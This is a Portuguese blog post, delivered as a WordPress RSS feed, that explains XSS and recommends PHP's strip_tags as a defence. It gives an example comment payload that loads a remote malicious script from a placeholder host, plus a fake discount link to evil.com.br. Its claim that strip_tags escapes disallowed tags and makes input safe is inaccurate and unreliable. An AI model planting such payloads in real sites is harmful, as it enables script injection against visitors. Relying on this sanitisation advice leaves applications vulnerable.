<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	
	xmlns:georss="http://www.georss.org/georss"
	xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
	>

<channel>
	<title>ataque Archives - Hiago Silva Souza</title>
	<atom:link href="https://www.hiago.me/tag/ataque/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.hiago.me/tag/ataque/</link>
	<description></description>
	<lastBuildDate>Sat, 13 May 2017 21:28:58 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.5.5</generator>

<image>
	<url>https://www.hiago.me/wp-content/uploads/2019/01/cropped-icon-hiagus-2-32x32.png</url>
	<title>ataque Archives - Hiago Silva Souza</title>
	<link>https://www.hiago.me/tag/ataque/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">147457425</site>	<item>
		<title>Segurança: O que é XSS?</title>
		<link>https://www.hiago.me/2017/04/30/seguranca-o-que-e-xss/</link>
					<comments>https://www.hiago.me/2017/04/30/seguranca-o-que-e-xss/#respond</comments>
		
		<dc:creator><![CDATA[Hiago Souza]]></dc:creator>
		<pubDate>Sun, 30 Apr 2017 03:00:51 +0000</pubDate>
				<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[ataque]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[prevenção]]></category>
		<category><![CDATA[xss]]></category>
		<guid isPermaLink="false">http://localhost/hiago/?p=50</guid>

					<description><![CDATA[<p>[wp_ad_camp_3] XSS, do inglês (Cross-site scripting) é um tipo de vulnerabilidade de segurança para o computador, ele é localizado geralmente em aplicações web. Com essa vulnerabilidade, é possível ativar ataques maliciosos ao injetarem um client-side script dentro de páginas web vista por outras pessoas. O Ataque! [wp_ad_camp_1] Através de um XSS, o cracker injeta códigos &#8230;</p>
<p>The post <a href="https://www.hiago.me/2017/04/30/seguranca-o-que-e-xss/">Segurança: O que é XSS?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>[wp_ad_camp_3]</p>
<p>XSS, do inglês (Cross-site scripting) é um tipo de vulnerabilidade de segurança para o computador, ele é localizado geralmente em aplicações web. Com essa vulnerabilidade, é possível ativar ataques maliciosos ao injetarem um client-side script dentro de páginas web vista por outras pessoas.</p>
<h1>O Ataque!</h1>
<p>[wp_ad_camp_1]</p>
<p>Através de um XSS, o cracker injeta códigos de uma linguagem client-side (no caso das páginas na web JavaScript) para que esse conteúdo seja executado no navegador do visitante do website.</p>
<blockquote><p>Exemplo de Ataque:</p>
<p>Seu site possui uma página de comentários, e você não aplicou as devidas validações na mesma. Com isso um cracker criou um arquivo .js e hospedou em algum lugar na internet, ai com isso ele colocou um comentário no seu site com o seguinte conteúdo &#8220;Nossa que legal =) &lt;script src=&#8217;https://algumlugarnainternet.com.br/script-malicioso.js&#8217;&gt;&lt;/script&gt;&#8221;, como você não tratou quando algum de seus visitantes for ver o conteúdo e carregar esse comentário automaticamente ele vai chamar o <strong>script-malicioso.js</strong> e interpretar tudo que tá escrito lá! Imagine que dentro do script-malicioso.js, contenha o conteúdo &#8221; document.body.innerHTML=&#8221;; &#8221; ou então o conteúdo &#8221; window.location.href=&#8217;http://www.sitedoseuconcorrente.com.br&#8217;; &#8220;!</p></blockquote>
<p>Esses são apenas alguns exemplos simples e fáceis de serem elaborados, ataques XSS tedem a ser mais perigosos do que se imagina. Pode se usar para roubo de senhas, tentativa de ataques a roteadores, manipulação de conteúdo, e o que a imaginação do cracker for capaz.</p>
<p>&nbsp;</p>
<h1>Como se prevenir:</h1>
<p>[wp_ad_camp_2]</p>
<p>Existem diversas maneiras de se previnir, tanto na hora de mostrar o conteúdo para o usuário na tela quanto na hora de levar essa informação ao seu banco de dados. No php podemos fazer o uso da função <span class="methodname"><strong><a href="http://php.net/manual/pt_BR/function.strip-tags.php">strip_tags</a> </strong>conforme exemplo abaixo:</span></p>
<p>&nbsp;</p>
<pre class="brush: php; title: ; notranslate">
&lt;?php
$tagsPermitidas = array('b', 'p');
$informacaoQueVaiParaOBanco = strip_tags($_POST&#x5B;'conteudo'], $tagsPermitidas);
</pre>
<p>&nbsp;</p>
<blockquote><p>Supondo que o valor de $_POST[&#8216;conteudo&#8217;] fosse &#8220;&lt;p&gt;&lt;a href=&#8217;http://evil.com.br&#8217;&gt;Clique aqui para desconto&lt;/a&gt; &lt;b&gt;Corra tem que ser agora!!&lt;/b&gt;&lt;/p&gt;&#8221;, o resultado que seria retornado do strip_tags com as $tagsPermitidas seria &#8220;&lt;p&gt;&amp;lt;a href=&#8217;http://evil.com.br&#8217;&amp;gt;Clique aqui para desconto&amp;lt;/a&amp;gt; &lt;b&gt;Corra tem que ser agora!!&lt;/b&gt;&lt;/p&gt;&#8221; e assim sua entrada de dados vai ficar tratada e segura!</p></blockquote>
<p>Obrigado!</p>
<p>Espero que com esse POST eu tenha contribuído para que vocês melhorem a segurança em suas aplicações.</p>
<p>The post <a href="https://www.hiago.me/2017/04/30/seguranca-o-que-e-xss/">Segurança: O que é XSS?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.hiago.me/2017/04/30/seguranca-o-que-e-xss/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">50</post-id>	</item>
	</channel>
</rss>
